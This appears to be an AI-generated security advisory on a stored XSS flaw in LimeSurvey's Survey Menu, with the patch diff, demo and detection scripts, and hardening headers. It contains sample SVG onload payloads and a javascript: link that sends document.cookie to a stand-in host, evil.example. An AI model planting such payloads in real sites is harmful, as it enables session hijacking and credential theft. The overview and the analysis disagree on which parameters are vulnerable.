CVE-2020-36993 Overview
CVE-2020-36993 is a stored cross-site scripting (XSS) vulnerability affecting LimeSurvey version 4.3.10. The vulnerability exists within the Survey Menu functionality of the administration panel, where attackers can inject malicious SVG scripts through the Surveymenu[title] and Surveymenu[parent_id] parameters. Once injected, the malicious JavaScript persists in the application and executes whenever administrative users access the affected pages, potentially leading to session hijacking, credential theft, or administrative account compromise.
Critical Impact
Authenticated attackers with access to the LimeSurvey administration panel can inject persistent malicious scripts that execute in the context of other administrators, enabling session hijacking and unauthorized administrative actions.
Affected Products
- LimeSurvey 4.3.10
- LimeSurvey versions prior to the security patch commit 3712854a8fd8d875c67640969a1d54c4d93d3676
Discovery Timeline
- 2026-01-28 - CVE-2020-36993 published to NVD
- 2026-01-29 - Last updated in NVD database
Technical Details for CVE-2020-36993
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) stems from insufficient input sanitization in the LimeSurvey administration panel's Survey Menu controller. The application fails to properly sanitize user-supplied input in the Surveymenu[title] and Surveymenu[description] parameters before storing them in the database and subsequently rendering them in administrative views.
The vulnerability requires authentication with access to the administration panel, meaning an attacker must first obtain valid credentials or compromise an existing account. However, once the malicious payload is stored, it will execute in the browser context of any administrator who views the affected Survey Menu content. This creates a privilege escalation pathway where a lower-privileged authenticated user could potentially compromise higher-privileged administrative accounts.
Root Cause
The root cause is improper input validation in the SurveymenuController.php file. When processing POST requests for survey menu creation or updates, the application directly accepts user input without sanitization. The title and description fields are stored as-is in the database and later rendered without proper output encoding, allowing embedded SVG scripts or other JavaScript payloads to execute when the page is rendered.
Attack Vector
The attack requires network access and an authenticated session to the LimeSurvey administration panel. An attacker crafts a malicious POST request containing JavaScript payload in SVG format within the Surveymenu[title] or Surveymenu[description] parameters. When an administrator navigates to the Survey Menu section, the stored payload executes in their browser session, potentially allowing the attacker to steal session tokens, modify survey configurations, create new administrative accounts, or perform other unauthorized actions.
// Security patch in application/controllers/admin/SurveymenuController.php
// Source: https://github.com/LimeSurvey/LimeSurvey/commit/3712854a8fd8d875c67640969a1d54c4d93d3676
$success = false;
if (Yii::app()->request->isPostRequest) {
$aSurveymenu = Yii::app()->request->getPost('Surveymenu', []);
+ // Sanitize title and description to prevent XSS attack
+ if (isset($aSurveymenu['title'])) {
+ $aSurveymenu['title'] = flattenText($aSurveymenu['title'], false, true);
+ }
+ if (isset($aSurveymenu['description'])) {
+ $aSurveymenu['description'] = flattenText($aSurveymenu['description'], false, true);
+ }
if ($aSurveymenu['id'] == '') {
unset($aSurveymenu['id']);
$aSurveymenu['created_at'] = date('Y-m-d H:i:s');
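Review bot: the hunk sanitizes only Surveymenu[title] and Surveymenu[description], yet the overview above names Surveymenu[parent_id] as an injection parameter; parent_id is an identifier and should be validated as an integer before it reaches the model, or the overview should be reconciled with what the fix actually covers. flattenText() also runs only on new POST requests, so rows stored before the patch keep whatever was injected, and the views that print these fields still need output encoding as the advisory's root-cause section notes; a one-off pass of flattenText() over existing surveymenu rows would close that gap.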
The fix applies the flattenText() function to sanitize user input before processing, stripping potentially malicious HTML and JavaScript content.
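The following is an added example, not LimeSurvey code, that models the data flow described above: a menu title is stored and later printed into an admin page. It contrasts the vulnerable path (store raw, interpolate raw) with the patched path (sanitize on input, the role flattenText() plays in the fix) and adds output encoding as a second layer, which also neutralizes rows that were written before the patch. `strip_tags` is a simplified stand-in for flattenText(), the in-memory `DB` dict stands in for the surveymenu table, and the sample title is constructed.

```python
"""Stored XSS in a survey-menu title: vulnerable vs hardened handling.

Constructed example, not LimeSurvey code. strip_tags() is a simplified
stand-in for LimeSurvey's flattenText(); the render_* functions mimic a
view that prints the stored title into an admin page.
"""
import html
import re

# In-memory stand-in for the surveymenu table: id -> row
DB: dict = {}

# Constructed sample input of the kind listed in the advisory's IoCs
MALICIOUS_TITLE = '<svg onload="alert(document.cookie)">Survey settings</svg>'

_TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(value: str) -> str:
    """Input sanitization: remove anything that looks like an HTML tag.

    A blunt allow-nothing filter is fine here because a menu title is
    plain text; richer fields would need an allow-list HTML sanitizer.
    """
    return _TAG_RE.sub("", value).strip()


def store_vulnerable(row_id: int, title: str) -> None:
    """Vulnerable controller: stores the POSTed title as-is."""
    DB[row_id] = {"id": row_id, "title": title}


def render_vulnerable(row_id: int) -> str:
    """Vulnerable view: interpolates the stored value without encoding."""
    return f"<li class='menu-item'>{DB[row_id]['title']}</li>"


def store_hardened(row_id: int, title: str) -> None:
    """Patched controller: sanitize on input, as the fix does for title/description."""
    DB[row_id] = {"id": row_id, "title": strip_tags(title)}


def render_hardened(row_id: int) -> str:
    """Defense in depth: HTML-encode on output regardless of what is stored."""
    return f"<li class='menu-item'>{html.escape(DB[row_id]['title'], quote=True)}</li>"


def contains_active_markup(fragment: str) -> bool:
    """Heuristic check: does the rendered HTML still contain a tag with an event handler?"""
    return re.search(r"<\w+[^>]*\son\w+\s*=", fragment, re.IGNORECASE) is not None


def demo() -> dict:
    """Run the three flows and return the rendered fragments for inspection."""
    store_vulnerable(1, MALICIOUS_TITLE)
    store_hardened(2, MALICIOUS_TITLE)
    # Row 3: a legacy row written before the patch, read through the hardened view
    store_vulnerable(3, MALICIOUS_TITLE)
    return {
        "vulnerable": render_vulnerable(1),
        "hardened": render_hardened(2),
        "legacy_row_hardened_view": render_hardened(3),
    }


if __name__ == "__main__":
    for name, fragment in demo().items():
        print(f"{name}: {fragment}  [active markup: {contains_active_markup(fragment)}]")
```

The legacy-row case is the one to note: input sanitization alone leaves pre-patch rows live, which is why the advisory recommends reviewing existing database entries, whereas encoding at render time covers them without a data migration.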
Detection Methods for CVE-2020-36993
Indicators of Compromise
- Presence of SVG tags or JavaScript code in survey menu titles or descriptions in the database
- Unexpected <script>, <svg>, or onload attributes in LimeSurvey database fields
- Unusual administrative session activity or session tokens being sent to external domains
- Web server logs showing POST requests to Survey Menu endpoints with encoded script payloads
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect XSS payload patterns in POST parameters targeting /admin/surveymenu endpoints
- Review database contents for survey menu entries containing HTML tags, SVG elements, or JavaScript event handlers
- Monitor Content Security Policy (CSP) violation reports for inline script execution attempts
- Deploy SentinelOne Singularity XDR to detect anomalous browser behavior and exfiltration attempts from administrative sessions
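As an added example covering both the indicators listed above and the database and log review strategies, the script below scans survey-menu rows and web-server access log lines for the payload shapes the advisory names (script and SVG tags, inline event handlers, javascript: URLs). It is not SentinelOne or LimeSurvey tooling; the rows, log lines and column names are constructed, and the /admin/surveymenu path is taken from the advisory. One caveat the code reflects: a standard access log records only the request line, so a payload sent in the POST body is invisible there and needs an application log or a WAF audit log.

```python
"""Hunt for stored-XSS artifacts in LimeSurvey survey-menu rows and access logs.

Constructed example, not LimeSurvey or SentinelOne tooling. Column names and
sample data are assumptions; the endpoint path comes from the advisory.
"""
import re
from urllib.parse import unquote_plus

# Payload shapes from the advisory's IoC list (tags, SVG, event handlers),
# plus javascript: URLs, which belong to the same class of payloads.
SUSPICIOUS = re.compile(
    r"<\s*(script|svg|iframe|img|object|embed)\b"
    r"|\bon[a-z]+\s*="
    r"|javascript\s*:",
    re.IGNORECASE,
)

# Constructed rows as a dump of the surveymenu table might look
SAMPLE_ROWS = [
    {"id": 1, "title": "Survey settings", "description": "Edit general settings"},
    {"id": 2, "title": '<svg onload="alert(1)">Settings</svg>', "description": ""},
    {"id": 3, "title": "Responses",
     "description": 'Click <a href="javascript:fetch(\'//evil.example/?c=\'+document.cookie)">here</a>'},
    {"id": 4, "title": "Reports & Stats", "description": "Totals < limits"},  # benign '<'
]

# Constructed Apache combined-log lines. Note that only the request line is
# logged: line 1 is a POST whose body is not visible, line 3 carries the
# payload in the query string, which is the only case an access log can show.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jan/2026:10:12:01 +0000] "POST /index.php/admin/surveymenu/sa/update HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.7 - - [28/Jan/2026:10:13:44 +0000] "GET /index.php/admin/surveymenu/sa/index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Jan/2026:10:15:09 +0000] "POST /index.php/admin/surveymenu/sa/update?Surveymenu%5Btitle%5D=%3Csvg%20onload%3Dalert%281%29%3E HTTP/1.1" 302 - "-" "curl/8.0"
"""


def scan_rows(rows):
    """Return (id, field) for every title/description that matches a payload pattern."""
    hits = []
    for row in rows:
        for field in ("title", "description"):
            value = row.get(field) or ""
            if SUSPICIOUS.search(value):
                hits.append((row["id"], field))
    return hits


_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_log(text):
    """Return 1-based line numbers of POSTs to survey-menu endpoints whose
    decoded request target carries a payload.

    Decoding is repeated so that double-encoded payloads are not missed.
    """
    flagged = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = _REQ_RE.search(line)
        if not m or m.group("method") != "POST":
            continue
        target = m.group("target")
        if "/admin/surveymenu" not in target:
            continue
        decoded = target
        for _ in range(3):
            nxt = unquote_plus(decoded)
            if nxt == decoded:
                break
            decoded = nxt
        if SUSPICIOUS.search(decoded):
            flagged.append(lineno)
    return flagged


if __name__ == "__main__":
    print("suspicious rows:", scan_rows(SAMPLE_ROWS))
    print("suspicious log lines:", scan_log(SAMPLE_LOG))
```

Row 4 shows why the pattern requires a tag name after the angle bracket rather than flagging every `<`: descriptions legitimately contain comparison text, and a noisy rule gets switched off. For a real review, feed `scan_rows` the result of a `SELECT id, title, description FROM ...` against the surveymenu table instead of the constructed list.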
Monitoring Recommendations
- Enable detailed logging for the LimeSurvey administration panel and monitor for suspicious Survey Menu modifications
- Configure browser-based monitoring to detect script injection attempts and unexpected DOM modifications
- Set up alerts for outbound network connections from administrative workstations to unknown domains following LimeSurvey access
- Regularly audit survey menu entries for unexpected or encoded content
How to Mitigate CVE-2020-36993
Immediate Actions Required
- Update LimeSurvey to a version that includes the security patch (commit 3712854a8fd8d875c67640969a1d54c4d93d3676 or later)
- Review and sanitize existing survey menu entries in the database for malicious content
- Implement strict Content Security Policy (CSP) headers to mitigate XSS impact
- Restrict administrative panel access to trusted networks and require multi-factor authentication
Patch Information
LimeSurvey has released a security patch addressing this vulnerability. The fix is available in commit 3712854a8fd8d875c67640969a1d54c4d93d3676. The patch adds input sanitization using the flattenText() function for both the title and description fields in the Survey Menu controller, as well as the full_name field in the User Management controller. Organizations should update to the latest LimeSurvey version that incorporates this fix.
For additional technical details, refer to the VulnCheck Advisory for LimeSurvey and Exploit-DB #48762.
Workarounds
- If immediate patching is not possible, restrict access to the LimeSurvey administration panel to a limited set of trusted users
- Implement a Web Application Firewall (WAF) with XSS detection rules to filter malicious payloads
- Add Content Security Policy headers to prevent inline script execution: Content-Security-Policy: script-src 'self';
- Manually sanitize database entries by removing any HTML or script content from survey menu title and description fields
# Configuration example - Add CSP headers in Apache
# Add to .htaccess or Apache configuration for LimeSurvey
# Test in a staging environment first: a strict script-src blocks any inline
# scripts the admin pages rely on, so adjust the policy if pages break.
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';"
Header set X-Content-Type-Options "nosniff"
# X-XSS-Protection is deprecated and ignored by current browsers; it is harmless
# to keep for legacy clients, but the CSP header above is the effective control.
Header set X-XSS-Protection "1; mode=block"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.